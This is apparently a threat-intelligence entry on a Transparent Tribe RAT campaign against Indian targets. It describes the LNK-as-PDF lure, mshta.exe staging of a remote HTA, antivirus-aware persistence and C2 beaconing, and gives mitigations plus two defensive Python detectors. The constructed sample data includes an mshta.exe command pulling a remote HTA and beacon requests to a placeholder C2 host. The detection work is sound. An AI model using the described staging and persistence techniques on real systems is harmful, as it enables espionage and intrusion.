Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia
The threat actor known as Transparent Tribe has been attributed to a fresh set of attacks targeting Indian governmental, academic, and strategic entities with a remote access trojan (RAT) that grants them persistent control over compromised hosts. "The campaign employs deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document
AI Analysis
Technical Summary
Transparent Tribe, also tracked as APT36, is a state-sponsored espionage group active since at least 2013 that primarily targets Indian governmental, academic, and strategic entities. The current campaign relies on spear-phishing emails carrying ZIP archives; inside is a Windows shortcut (LNK) file dressed up as a PDF. When the victim opens it, the shortcut invokes mshta.exe to run a remote HTML Application (HTA) script, which decrypts the RAT and loads it directly into memory while opening a decoy PDF so the user sees what they expected. Nothing of the RAT itself needs to touch disk at this stage, which is why the chain is better caught at the mshta.exe launch than by file scanning.

The implant then profiles the host's security software and picks a persistence method to suit: with Kaspersky present it writes an obfuscated HTA payload and a LNK file into a startup folder; with Quick Heal it uses batch scripts; with Avast, AVG or Avira it copies the payload directly; and with no recognized product it falls back to registry and batch-file persistence. The RAT DLL (iinneldc.dll) supports remote system control, file operations, data exfiltration, screenshot capture, clipboard manipulation, and process control. A secondary campaign uses a malicious shortcut to deliver a .NET-based loader that drops DLLs and executables and persists via registry modifications and startup scripts.

Command-and-control traffic consists of obfuscated HTTP GET requests covering registration, heartbeat, command execution, and anti-VM checks. The C2 infrastructure was inactive at the time of analysis, but the persistence mechanisms would let an implant resume operation if that infrastructure is brought back online, so an inactive C2 is not a reason to skip cleanup. The campaign is consistent with a persistent, strategically motivated espionage operation focused on intelligence collection from Indian entities; the actor's evolving toolset and AV-aware persistence complicate both detection and remediation.

The report also references related activity by the Patchwork group against Pakistani targets, a reminder that espionage in the region runs in both directions.
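The delivery and persistence chain described above is visible in ordinary endpoint telemetry. The following Python is an added example, not code from the report or from the actor's tooling: it applies a few detection rules to constructed Sysmon-style events (process creation, file creation, registry value set). The hostnames, user paths, the HTA URL and the Run-key value name are placeholders, not indicators from the report.

```python
"""Endpoint detection logic for the LNK -> mshta.exe -> startup/Run-key chain.
Runs over constructed Sysmon-style events (not real telemetry)."""
import re
from dataclasses import dataclass

# Sysmon event IDs used here: 1 = process create, 11 = file create, 13 = registry value set.
# A URL or UNC path on the mshta.exe command line means the HTA is fetched remotely.
REMOTE_ARG_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)
# Per-user and all-users Startup folders both end in ...\Start Menu\Programs\Startup\.
STARTUP_FILE_RE = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:lnk|hta|bat|cmd|vbs|js)$", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# Run-key values that launch scripts or script hosts rather than a signed application.
SCRIPT_HOST_RE = re.compile(
    r"\.(?:hta|bat|cmd|vbs|js|ps1)\b|\b(?:mshta|wscript|cscript|powershell)(?:\.exe)?\b", re.I)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def analyze(events):
    """Return a Finding for every event that matches one of the rules."""
    findings = []
    for ev in events:
        host, eid = ev["Computer"], ev["EventID"]
        if eid == 1:
            image = _base(ev["Image"])
            parent = _base(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            if image == "mshta.exe" and REMOTE_ARG_RE.search(cmd):
                findings.append(Finding("mshta_remote_hta", host, cmd))
            elif image == "mshta.exe" and parent == "explorer.exe":
                # mshta.exe started straight from the shell: typical of a double-clicked LNK.
                findings.append(Finding("mshta_from_shell", host, cmd))
        elif eid == 11:
            target = ev["TargetFilename"]
            if STARTUP_FILE_RE.search(target):
                findings.append(Finding("startup_folder_persistence", host,
                                        f"{_base(ev['Image'])} wrote {target}"))
        elif eid == 13:
            key, value = ev["TargetObject"], ev.get("Details", "")
            if RUN_KEY_RE.search(key) and SCRIPT_HOST_RE.search(value):
                findings.append(Finding("run_key_script_persistence", host, f"{key} = {value}"))
    return findings


# Constructed sample events; every path, URL and key name below is a placeholder.
SAMPLE_EVENTS = [
    # 1. LNK disguised as a PDF: explorer.exe launches mshta.exe with a remote HTA.
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://hta.example.invalid/report.hta"},
    # 2. Decoy PDF opened for the user: benign on its own.
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Program Files\Adobe\Acrobat\Acrobat.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"Acrobat.exe" C:\Users\alice\AppData\Local\Temp\report.pdf'},
    # 3. Legitimate local HTA run by an installer: no remote argument, not from the shell.
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\wizard.hta"'},
    # 4. Persistence: the HTA drops a shortcut into the per-user Startup folder.
    {"EventID": 11, "Computer": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\report.lnk"},
    # 5. Fallback persistence: Run key pointing at a batch file under %TEMP%.
    {"EventID": 13, "Computer": "WS01", "Image": r"C:\Windows\System32\mshta.exe",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\alice\AppData\Local\Temp\run.bat"},
    # 6. Legitimate Run key value: a signed application, no script host.
    {"EventID": 13, "Computer": "WS02", "Image": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKU\S-1-5-21-2000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

On the sample, events 1, 4 and 5 fire and events 2, 3 and 6 stay quiet. Event 2 is still worth a correlation rule in a real deployment: mshta.exe spawning a PDF reader is exactly the decoy behaviour described above, and tying it to the preceding mshta.exe launch on the same host turns three weak signals into one strong one.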
Potential Impact
The direct impact on European organizations is limited, since the campaign targets Indian government and academia. The risk is indirect: European entities with ties to Indian governmental or academic institutions, joint research programs, diplomatic missions, Indian diaspora links, or strategic partnerships are plausible secondary targets, and the tradecraft itself (LNK-as-PDF lures, mshta.exe staging, antivirus-aware persistence) transfers unchanged to any Windows estate. Where an infection does occur, the RAT's remote-control, file, screenshot and clipboard capabilities amount to full interactive access, which in practice means loss of confidentiality of research and policy material, theft of intellectual property, and possible operational disruption. Deceptive delivery combined with persistence tuned to the installed antivirus raises both the chance of initial compromise and the expected dwell time. More broadly, the activity illustrates how regional state-sponsored groups keep refining their tooling; the exposure for Europe runs mostly through supply-chain and third-party relationships with affected organizations.
Mitigation Recommendations
European organizations should apply email security controls that detect and block spear-phishing attempts carrying LNK files, in particular LNK files inside ZIP archives and any shortcut whose name or icon imitates a PDF; quarantining archives that contain shortcuts is a low-cost, high-yield rule. Endpoint detection and response (EDR) should alert on mshta.exe launched with a URL or UNC path on its command line, on mshta.exe started directly by explorer.exe, and on mshta.exe spawning a document viewer (the decoy), since the RAT itself is loaded in memory and will not appear as a dropped file. Regularly audit the per-user and all-users Startup folders, the HKCU and HKLM Run and RunOnce keys, and scheduled tasks for HTA files, batch scripts, or shortcuts that point at script hosts; these are the locations this implant chooses from depending on which antivirus it finds. Antivirus and anti-malware with heuristic and behavioral detection remain useful for the obfuscated HTA stages and the loader, but should not be the only control, because the persistence logic is explicitly designed around specific products. User awareness training should cover the specific trick in use here: a shortcut that looks like a PDF, opens a PDF, and still infects the machine.

On the network side, proxy and egress logs should be reviewed for regular-cadence HTTP GET requests to unfamiliar hosts with opaque or changing query tokens, which is the heartbeat pattern described in the summary. Application control (Windows Defender Application Control or AppLocker) can block mshta.exe and other script hosts for standard users outright; Microsoft's own recommended block rules already list mshta.exe, so this is a supported baseline rather than an exotic hardening step. Keep threat intelligence feeds current for Transparent Tribe and related groups, and for organizations with Indian ties, raise monitoring and incident response readiness for espionage-style activity. Finally, segment networks so that a compromised workstation cannot easily reach file shares and research repositories, which limits both lateral movement and the volume available for exfiltration.
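For the network monitoring point above, the heartbeat traffic described in the summary (repeated HTTP GETs at a fixed cadence, each carrying an opaque token) is detectable from interval statistics alone, without any indicator of the actual infrastructure. The Python below is an added example, not from the report: it groups GET requests per client and destination from constructed proxy log lines, flags groups whose inter-request jitter is low, and scores how random-looking the long tokens in the URL are. The log format, the hostnames and the tokens are all constructed placeholders.

```python
"""Beacon detection over constructed HTTP proxy log lines (not real telemetry)."""
import math
import re
from collections import Counter, defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Assumed log format: "<UTC time> <client ip> <method> <url> <status>".
# c2.example.invalid and the id= tokens are placeholders, not indicators from the report.
# The beacon fires roughly every 60 s with a few seconds of jitter; the other lines are
# ordinary browsing and an update check, mixed in to show what does not get flagged.
SAMPLE_LOG = """\
2026-01-02T10:00:00Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=k3Zp8Qw1Tn6Xr2Mb 200
2026-01-02T10:00:05Z 10.0.0.25 GET https://updates.example.com/download/client-v2.3.1/manifest.json 200
2026-01-02T10:00:10Z 10.0.0.31 GET https://www.example.org/news/2026/01/02/index.html 200
2026-01-02T10:01:00Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=a9Yd4Lh7Vc0Fg5Js 200
2026-01-02T10:02:01Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=e1Rt6Kq3Wm8Xz5Np 200
2026-01-02T10:03:00Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=u2Bv7Gx4Hy9Cz0Dw 200
2026-01-02T10:04:00Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=o5Pj1Sf8Mk3Ql6Rt 200
2026-01-02T10:05:02Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=i4Nc9Wb2Xe7Ya0Zd 200
2026-01-02T10:05:05Z 10.0.0.25 GET https://updates.example.com/download/client-v2.3.1/manifest.json 304
2026-01-02T10:05:17Z 10.0.0.25 GET https://updates.example.com/download/client-v2.3.1/client.msi 200
2026-01-02T10:06:00Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=g6Tq3Vr8Hs1Jm5Kp 200
2026-01-02T10:07:00Z 10.0.0.25 GET http://c2.example.invalid/api/sync?id=w0Lx5Fn2Dy7Ce4Bz 200
2026-01-02T10:15:10Z 10.0.0.31 GET https://www.example.org/news/2026/01/02/index.html 200
2026-01-02T10:15:12Z 10.0.0.31 GET https://www.example.org/static/site.css 200
2026-01-02T10:15:13Z 10.0.0.31 GET https://www.example.org/static/app.js 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")
TOKEN_RE = re.compile(r"[A-Za-z0-9]{12,}")  # long alphanumeric runs in path or query


def parse_log(text):
    """Parse log lines into (timestamp, client, method, url, status) tuples."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            rows.append((ts, m.group(2), m.group(3), m.group(4), int(m.group(5))))
    return rows


def shannon_entropy(s):
    """Bits of entropy per character; 16 distinct characters score exactly 4.0."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def opaque_score(url):
    """Highest entropy among long tokens in the URL path and query (0.0 if none)."""
    parts = urlsplit(url)
    tokens = TOKEN_RE.findall(parts.path + "?" + parts.query)
    return max((shannon_entropy(t) for t in tokens), default=0.0)


def find_beacons(rows, min_requests=6, max_cv=0.2):
    """Flag (client, host) pairs whose GET inter-arrival times are unusually regular.

    jitter_cv is the coefficient of variation of the gaps (stdev / mean); malware
    heartbeats sit well below 0.2, human browsing is far above it."""
    groups = defaultdict(list)
    for ts, src, method, url, _status in rows:
        if method == "GET":
            groups[(src, urlsplit(url).hostname)].append((ts, url))
    hits = []
    for (src, host), reqs in groups.items():
        if len(reqs) < min_requests:
            continue
        reqs.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv > max_cv:
            continue
        urls = [u for _, u in reqs]
        hits.append({
            "src": src, "host": host, "requests": len(reqs),
            "mean_interval_s": avg, "jitter_cv": cv,
            "opaque_entropy": mean(opaque_score(u) for u in urls),
            "distinct_url_ratio": len(set(urls)) / len(urls),
        })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(hit)
```

The update check and the news site drop out on request count alone, and would also fail the jitter test. The flagged group reports a 60 s mean interval, a coefficient of variation around 0.02, a fresh URL on every request and a token entropy of 4.0 bits per character, which together are hard to explain as anything other than a beacon. In production, raise min_requests and run the analysis over hours rather than minutes, and treat the entropy and distinct-URL figures as context for the analyst rather than as hard thresholds, since CDN cache-busters produce similar tokens at irregular intervals.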
Affected Countries
United Kingdom, Germany, France, Netherlands, Italy, Belgium, Sweden
Technical Details
- Article Source: https://thehackernews.com/2026/01/transparent-tribe-launches-new-rat.html (fetched 2026-01-02T13:58:37Z; 1,874 words)
Threat ID: 6957cf0ddb813ff03eec907e
Added to database: 1/2/2026, 1:58:37 PM
Last enriched: 1/2/2026, 1:58:58 PM
Last updated: 1/8/2026, 6:40:22 AM